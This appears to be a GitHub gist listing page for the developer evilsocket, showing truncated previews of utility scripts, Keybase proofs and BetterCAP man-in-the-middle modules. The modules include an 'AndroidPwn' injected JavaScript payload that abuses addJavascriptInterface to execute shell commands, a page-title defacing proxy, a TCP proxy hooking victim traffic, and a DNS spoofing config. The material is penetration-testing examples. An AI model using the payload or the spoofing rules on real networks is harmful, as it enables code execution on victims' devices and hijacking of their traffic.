Skip to content

Instantly share code, notes, and snippets.

@evilsocket
evilsocket / wp2swg.php
Created April 6, 2011 17:56
A script to import wordpress xml dumps to swg txt files
<?php
$source = 'wp.xml';
$siteurl = "http://www.evilsocket.net";
$doc = new DOMDocument();
$doc->load( $source );
$items = $doc->getElementsByTagName( "item" );

Keybase proof

I hereby claim:

  • I am evilsocket on github.
  • I am evilsocket (https://keybase.io/evilsocket) on keybase.
  • I have a public key whose fingerprint is E242 9918 770E 94AD 9412 BFDC E244 814B C591 3655

To claim this, I am signing this object:

@evilsocket
evilsocket / piping.sh
Created June 8, 2015 17:17
Periodically scan your network searching for your Raspberry Pi board and update your /etc/hosts file with its ip address.
#!/bin/bash
#
# Periodically scan your network searching for your
# Raspberry Pi board and update your /etc/hosts file
# with its ip address.
#
# Copyleft by Simone 'evilsocket' Margaritelli
# http://www.evilsocket.net
# evilsocket at gmail dot com
#
arp =
"? (192.168.1.117) at 00:92:d4:06:01:32 [ether] on enp2s0\n" +
"? (192.168.1.112) at <incomplete> on enp2s0\n" +
"? (192.168.1.127) at <incomplete> on enp2s0\n" +
"? (192.168.1.122) at <incomplete> on enp2s0\n" +
"? (192.168.1.121) at <incomplete> on enp2s0\n" +
"? (192.168.1.4) at <incomplete> on enp2s0\n" +
"? (192.168.1.3) at <incomplete> on enp2s0\n" +
"? (192.168.1.14) at <incomplete> on enp2s0\n" +
"? (192.168.1.13) at <incomplete> on enp2s0\n" +
public class WebViewGUI extends Activity {
WebView mWebView;
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
mWebView=new WebView(this);
mWebView.getSettings().setJavaScriptEnabled(true);
mWebView.addJavascriptInterface(new JavaScriptInterface(), "jsinterface");
mWebView.loadUrl("file:///android_asset/www/index.html");
setContentView(mWebView);
}
class AndroidPwn < BetterCap::Proxy::Module
@@command = nil
@@payload = "<script>\n" +
"var command = ['/system/bin/sh','-c','COMMAND_HERE'];\n" +
"for(i in top) {\n" +
" try {\n" +
" top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);\n" +
" break;\n" +
" }\n" +
"catch(e) {}\n" +

Keybase proof

I hereby claim:

  • I am evilsocket on github.
  • I am evilsocket (https://keybase.io/evilsocket) on keybase.
  • I have a public key whose fingerprint is 7F1A D5FA 2A51 87DF DD53 DDA9 1564 D7F3 0393 A456

To claim this, I am signing this object:

@evilsocket
evilsocket / hack_title.rb
Last active May 16, 2018 14:11
BetterCAP example HTTP(S) Proxy Module
class HackTitle < BetterCap::Proxy::HTTP::Module
meta(
'Name' => 'HackTitle',
'Description' => 'Adds a "!!! HACKED !!!" string to every webpage title.',
'Version' => '1.0.0',
'Author' => "Simone 'evilsocket' Margaritelli",
'License' => 'GPL3'
)
# called before the request is performed
@evilsocket
evilsocket / example.rb
Last active September 1, 2020 19:46
BetterCAP example TCP Proxy Module
class Example < BetterCap::Proxy::TCP::Module
meta(
'Name' => 'Example',
'Description' => 'Example TCP proxy module.',
'Version' => '1.0.0',
'Author' => "Simone 'evilsocket' Margaritelli",
'License' => 'GPL3'
)
# Received when the victim is sending data to the upstream server.
@evilsocket
evilsocket / dns.conf
Created March 16, 2016 17:56
BetterCAP example DNS server redirection file.
# Empty lines or lines starting with # will be ignored.
# redirect *.google.com to the attacker ip address
local .*google\.com
# redirect *.microsoft.com to 10.10.10.10
10.10.10.10 .*microsoft\.com